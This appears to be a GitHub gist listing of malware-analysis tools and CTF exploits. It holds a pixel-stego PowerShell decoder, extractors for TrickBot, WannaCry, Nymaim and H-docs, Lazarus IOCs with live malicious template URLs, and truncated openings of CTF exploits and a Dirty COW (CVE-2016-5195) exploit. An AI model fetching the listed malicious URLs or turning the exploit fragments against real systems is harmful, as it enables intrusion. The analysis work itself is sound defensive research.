mak / x.py
Created July 21, 2020 11:53
decode some PowerShell malware from an image
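# Decode a payload hidden in the low nibbles of an image's pixels.
# Each output byte packs the low 4 bits of the blue channel (px[2]) into the
# high nibble and the low 4 bits of the green channel (px[1]) into the low
# nibble; pixels are read row-major over a 26 x 800 region of `img`.
# Assumes `img` is an already-opened image object exposing getpixel((x, y))
# (PIL-style) — the snippet does not show where it is created.
# `ret` is deliberately kept at 40000 slots (only the first 20800 are written)
# so downstream code that relies on its length keeps working.
ret = [0 for _ in range(40000)]
for i in range(26):
    for j in range(800):
        try:
            px = img.getpixel((j, i))
        except Exception:
            # Unreadable pixel (e.g. coordinates outside the image): leave the
            # slot as 0. Narrowed from a bare `except:` so KeyboardInterrupt
            # and SystemExit still propagate.
            continue
        # `& 0xf` always yields an int, so the original math.floor() was a
        # no-op; (x & 0xf) * 4 * 4 is exactly (x & 0xf) << 4.
        ret[i * 800 + j] = ((px[2] & 0xf) << 4) | (px[1] & 0xf)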
mak / ioc.txt
Created May 14, 2020 16:20
Lazarus campaign using @LockheedMartin, @BAESystemsplc, @Boeing as decoys
first stage documents:
LM_IFG_536R.docx.docx - 9724ee7a6baf421ac5a2a3c93d32e796e2a33d7d75bbfc02239fc9f4e3a41e0
Boeing_PMS.docx - a3eca35d14b0e020444186a5faaba5997994a47af08580521f808b1bb83d6063
Senior_Design_Engineer.docx - 49724ee7a6baf421ac5a2a3c93d32e796e2a33d7d75bbfc02239fc9f4e3a41e0
Boeing_DSS_SE.docx - 322aa22163954ff3ff017014e357b756942a2a762f1c55455c83fd594e844fdd
remote templates:
https://www.astedams.it/uploads/frame/61.dotm
https://www.astedams.it/uploads/template/17.dotm
mak / x.c
Created April 29, 2020 17:24
get_win_name
BOOL __cdecl get_win_name(int a1, _DWORD *a2)
{
BOOL result; // eax
bool v3; // zf
struct _OSVERSIONINFOA VersionInformation; // [esp+8h] [ebp-98h]
std::string::operator=(a1, "unknown Windows version");
*a2 = 0;
VersionInformation.dwOSVersionInfoSize = 148;
result = GetVersionExA(&VersionInformation);
mak / trick.py
Created May 16, 2019 19:23
Get config from unpacked trickbot
import re
import sys
import pefile
from mlib.crypto import xor
from mlib.malware import trickbot
from mlib.struct import udword
def find_cfg_params(data):
mak / x.js
Created March 27, 2019 11:45
exploit of plang chall from 0ctf2019
fun int2double(xint) { var i = 0 while(i< 1074) { xint = xint / 2 i = i + 1} return xint }
fun double2int(xd) { var i = 0 while(i< 1074) { xd = xd + xd i = i + 1} return xd }
fun shift(xint,x) { var i = 0 while(i<x) { xint = xint + xint i = i + 1} return xint }
var c = -30
var x = -114
var y = -115
var a = [101,1,1,1,1,1,1,1,1,1]
var b = [1011,2,"chuj",3,4]
mak / exp300.py
Created January 3, 2018 17:29
Exploit for 300 at 34c3ctf
import phun
class R(phun.Remote):
def menu(self):
self.read('4) free\n')
def cmd(self,nr,idx):
self.menu()
self.sendline(str(nr))
mak / wcr.py
Last active October 28, 2018 21:09
Extract everything from WannaCry
import re
import os,sys
import pefile
import struct
import zipfile
import hashlib
import StringIO
from Crypto import Random
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5,AES
mak / x.sh
Created March 7, 2017 12:19
one-liner to extract the PowerShell command from recent Nymaim documents
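# Extract the PowerShell command from a Nymaim maldoc's VBA macro.
# Input: $document — path to the document. Output: the decoded command, lowercased.
# Pipeline: olevba dumps the macro source; sed rewrites the VBA syntax into
# Python (& -> +, NaN -> None, Array(...) -> [...], quote fix-ups); the
# appended print statement emits the longest str global; python2 runs the
# result; tr strips '^' characters and lowercases the output.
# NOTE(review): the rewritten macro text is *executed* by `python2 -`, i.e.
# code derived from the document runs with this shell's privileges — treat
# the document as hostile and run this only inside an isolated analysis VM.
# Fix: "$document" is quoted so a path containing spaces or glob characters
# reaches olevba as a single argument.
( olevba "$document" | grep ' = ' | \
sed -e's/&/+/g' -e's/NaN/None/g' -e's/ = [^A].*(\(A.*)\))/= \1/' -e 's/Array//' \
-e's/(/[/g' -e's/)/]/g' -e "s#\"\([^\"]*\)\"\([^\"]*\)\"#\"\1'\2#" | \
grep '\[\|\+'; \
echo 'print globals()[sorted(globals(),key=lambda x: type(globals()[x]) == str and len(globals()[x]))[-1]]'
) \
| python2 - | tr -d '^' | tr '[:upper:]' '[:lower:]'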
mak / hdoc.py
Last active October 28, 2018 21:09
Extract payload from H-docs
#!/usr/bin/env python2
import os
import re
import sys
import math
import pefile
import struct
import hashlib
import argparse
from oletools import olevba
mak / naughtyc0w.c
Created October 22, 2016 20:48
exploit for CVE-2016-5195 nothing fancy
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/uio.h>
#include <sys/wait.h>